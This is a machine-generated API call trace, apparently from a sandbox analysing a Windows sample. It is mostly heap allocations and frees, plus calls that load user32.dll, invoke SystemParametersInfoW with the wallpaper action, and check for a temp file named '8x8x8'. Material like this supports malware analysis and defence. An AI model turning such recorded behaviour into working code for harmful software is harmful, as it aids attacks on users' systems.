RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0295.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0295.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0295.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0295.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0295.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0295.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0295.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0295.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0295.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0295.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0295.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0295.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0295.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0295.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0295.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0295.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0295.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0295.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0295.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0295.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0295.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0295.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0295.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0295.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0295.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0295.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0295.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0295.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0295.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0295.758] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0295.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0295.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0295.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0295.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0295.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0295.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0295.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0295.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0295.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0295.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0295.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0295.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0295.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0295.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0295.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0295.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0295.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0295.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0295.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0295.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0295.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0295.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0295.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0295.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0295.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0295.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0295.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0295.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0295.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0295.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0295.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0295.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0295.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0295.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0295.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0295.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0295.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0295.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0295.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0295.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0295.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0295.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0295.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0295.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0295.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0295.759] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0295.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0295.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0295.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0295.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69ba8 [0295.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69ba8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0295.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0295.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0295.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0295.760] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0295.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0295.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0295.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0295.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0295.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0295.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0295.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0295.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0295.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0295.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0295.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0295.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0295.761] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0295.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14b00 [0295.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0295.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0295.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0295.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0295.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0295.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0295.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0295.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0295.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0295.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0295.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0295.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0295.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0295.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0295.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0295.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0295.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0295.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0295.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0295.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0295.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0295.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0295.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0295.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0295.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0295.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0295.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0295.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0295.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0295.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0295.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0295.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0295.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0295.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0295.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0295.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0295.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0295.833] FreeLibrary (hLibModule=0x750c0000) returned 1 [0295.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0295.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0295.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0295.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0295.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0295.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0295.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0295.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0295.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0295.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0295.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0295.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0295.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0295.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0295.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0295.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0295.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0295.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0295.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0295.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0295.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0295.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0295.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0295.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0295.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0295.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0295.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0295.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0295.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0295.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0295.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0295.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0295.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0295.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14b00 | out: hHeap=0x970000) returned 1 [0295.835] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0295.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0295.835] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0295.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0295.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0295.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0295.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0295.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0295.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0295.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0295.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0295.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0295.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f146b0 | out: hHeap=0x970000) returned 1 [0295.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0295.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0295.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0295.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0295.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0295.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0295.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0295.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0295.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0295.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0295.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0295.836] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0295.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0295.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0295.836] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0295.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0295.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0295.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0295.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0295.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0295.837] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0295.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0295.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0295.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0295.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0295.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0295.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0295.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0295.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0295.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0295.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0295.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0295.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0295.837] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0295.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 